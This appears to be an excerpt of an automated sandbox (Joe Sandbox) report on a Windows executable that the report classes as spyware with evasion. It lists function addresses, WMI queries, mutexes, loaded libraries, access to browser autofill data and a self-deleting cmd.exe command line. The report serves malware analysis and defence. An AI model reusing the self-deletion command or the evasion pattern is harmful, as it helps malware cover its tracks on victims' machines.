Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004043580_2_00404358
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040941D0_2_0040941D
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040964F0_2_0040964F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A7700_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004077030_2_00407703
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004077F60_2_004077F6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00409A380_2_00409A38
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00412AC00_2_00412AC0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00425B560_2_00425B56
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00407DBE0_2_00407DBE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00404E540_2_00404E54
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00418E0E0_2_00418E0E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257A0200_2_0257A020
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D91D20_2_025D91D2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025801BB0_2_025801BB
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025BE5F70_2_025BE5F7
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259AA160_2_0259AA16
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02583ABA0_2_02583ABA
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D18620_2_025D1862
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02591E400_2_02591E40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259BD080_2_0259BD08
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D32390_2_025D3239
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A32240_2_025A3224
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A02250_2_025A0225
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B72D70_2_025B72D7
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C42F50_2_025C42F5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A628E0_2_025A628E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CF3400_2_025CF340
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D430E0_2_025D430E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025663200_2_02566320
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D632B0_2_025D632B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A53DD0_2_025A53DD
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025ED3D00_2_025ED3D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025DD3C00_2_025DD3C0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258C38E0_2_0258C38E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E33890_2_025E3389
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F13BD0_2_025F13BD
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A30010_2_025A3001
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025BE0300_2_025BE030
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D20E30_2_025D20E3
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257B0900_2_0257B090
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EE16F0_2_025EE16F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025AB13B0_2_025AB13B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025631300_2_02563130
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256B1F00_2_0256B1F0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B11800_2_025B1180
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256A1B00_2_0256A1B0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025811A00_2_025811A0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025626700_2_02562670
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EE6050_2_025EE605
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257B6950_2_0257B695
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C06900_2_025C0690
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025AC6AE0_2_025AC6AE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025777540_2_02577754
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257771C0_2_0257771C
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257670C0_2_0257670C
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025637900_2_02563790
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025824490_2_02582449
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A64680_2_025A6468
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025634000_2_02563400
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B74D00_2_025B74D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B34D60_2_025B34D6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256B4C00_2_0256B4C0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EF4C20_2_025EF4C2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256E4900_2_0256E490
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A45440_2_025A4544
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D352A0_2_025D352A
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025985C90_2_025985C9
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D85F40_2_025D85F4
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02598A440_2_02598A44
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A4A880_2_025A4A88
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258BAB00_2_0258BAB0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02586B580_2_02586B58
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A2B5E0_2_025A2B5E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02561B500_2_02561B50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256BB500_2_0256BB50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D1B400_2_025D1B40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258DB7B0_2_0258DB7B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258EB690_2_0258EB69
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B6B1B0_2_025B6B1B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EBB180_2_025EBB18
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256AB900_2_0256AB90
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259585F0_2_0259585F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025ED8440_2_025ED844
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256F8EC0_2_0256F8EC
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D38900_2_025D3890
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025648A00_2_025648A0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B98A50_2_025B98A5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025699500_2_02569950
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025739620_2_02573962
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257799F0_2_0257799F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C1E400_2_025C1E40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F0E400_2_025F0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_0552C3BF3_3_0552C3BF
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025702253_2_02570225
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255C38E3_2_0255C38E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A91D23_2_025A91D2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025501BB3_2_025501BB
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025511A03_2_025511A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E5F73_2_0258E5F7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256AA163_2_0256AA16
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02574A883_2_02574A88
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553ABA3_2_02553ABA
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02556B583_2_02556B58
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255DB7B3_2_0255DB7B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255EB693_2_0255EB69
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256585F3_2_0256585F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A18623_2_025A1862
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025898A53_2_025898A5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02561E403_2_02561E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255AE373_2_0255AE37
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557C6F3_2_02557C6F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553C053_2_02553C05
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02584D4A3_2_02584D4A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256BD083_2_0256BD08
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A32393_2_025A3239
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025732243_2_02573224
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025872D73_2_025872D7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025942F53_2_025942F5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257628E3_2_0257628E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259F3403_2_0259F340
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A430E3_2_025A430E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A632B3_2_025A632B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025363203_2_02536320
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025753DD3_2_025753DD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD3D03_2_025BD3D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025AD3C03_2_025AD3C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B33893_2_025B3389
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C13BD3_2_025C13BD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025730013_2_02573001
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E0303_2_0258E030
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254A0203_2_0254A020
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A20E33_2_025A20E3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B0903_2_0254B090
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE16F3_2_025BE16F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025331303_2_02533130
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257B13B3_2_0257B13B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B1F03_2_0253B1F0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025811803_2_02581180
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253A1B03_2_0253A1B0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025326703_2_02532670
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE6053_2_025BE605
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B6953_2_0254B695
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025906903_2_02590690
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257C6AE3_2_0257C6AE
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025477543_2_02547754
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254771C3_2_0254771C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254670C3_2_0254670C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025337903_2_02533790
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025524493_2_02552449
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025764683_2_02576468
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025334003_2_02533400
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025874D03_2_025874D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025834D63_2_025834D6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B4C03_2_0253B4C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BF4C23_2_025BF4C2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253E4903_2_0253E490
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025745443_2_02574544
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A352A3_2_025A352A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025685C93_2_025685C9
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A85F43_2_025A85F4
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02568A443_2_02568A44
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255BAB03_2_0255BAB0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02531B503_2_02531B50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253BB503_2_0253BB50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572B5E3_2_02572B5E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A1B403_2_025A1B40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BBB183_2_025BBB18
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586B1B3_2_02586B1B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253AB903_2_0253AB90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD8443_2_025BD844
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253F8EC3_2_0253F8EC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A38903_2_025A3890
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025348A03_2_025348A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025399503_2_02539950
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025439623_2_02543962
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254799F3_2_0254799F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02591E403_2_02591E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C0E403_2_025C0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02587E743_2_02587E74
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E363_2_02579E36
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02536EC03_2_02536EC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586ECC3_2_02586ECC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557EF13_2_02557EF1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257DEE03_2_0257DEE0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586F5B3_2_02586F5B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257CF7C3_2_0257CF7C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542F213_2_02542F21
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542C6E3_2_02542C6E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02580C003_2_02580C00
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02567C093_2_02567C09
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A5CD33_2_025A5CD3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586CC53_2_02586CC5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BDCE63_2_025BDCE6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02532C903_2_02532C90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557CA33_2_02557CA3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BFCA73_2_025BFCA7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572D423_2_02572D42
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02577D143_2_02577D14
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02578D253_2_02578D25
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02594DD03_2_02594DD0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586DD23_2_02586DD2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025BCAF0 appears 156 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 02533D50 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025ADE90 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025BC9A0 appears 60 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 00416398 appears 132 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 025ECAF0 appears 112 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 00416EF8 appears 50 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 025EC9A0 appears 45 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 02563D50 appears 73 times
Source: app.exe, 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs app.exe
Source: app.exe, 00000003.00000000.2681579898.000000000044D000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename vs app.exe
Source: app.exeBinary or memory string: OriginalFilename vs app.exe
Source: app.exe.0.drBinary or memory string: OriginalFilename vs app.exe
Source: app.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: app.exe.0.drBinary string: Could not open \device\physicalmemory
Source: app.exe.0.drBinary string: Could not map view of %X length %XCould not open \device\physicalmemory\device\physicalmemoryRtlNtStatusToDosErrorNtMapViewOfSectionNtOpenSectionNtUnmapViewOfSectionntdll.dllRtlInitUnicodeString%c
Source: classification engineClassification label: mal100.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C2A50 GetModuleHandleW,FormatMessageW,GetLastError,HeapFree,0_2_025C2A50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A130 GetVersionExA,CoCreateInstance,CoSetProxyBlanket,VariantInit,lstrlenW,lstrcpynA,WideCharToMultiByte,0_2_0040A130
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00423119 EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_00423119
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeMutant created: \Sessions\1\BaseNamedObjects\hrzbaov
Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\7041956494665639546Jump to behavior
Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\app.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\app.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: app.exe, 00000003.00000003.3188734917.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: app.exeVirustotal: Detection: 11%
Source: C:\Users\user\Desktop\app.exeFile read: C:\Users\user\Desktop\app.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5Jump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: oledlg.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: oledlg.dllJump to behavior
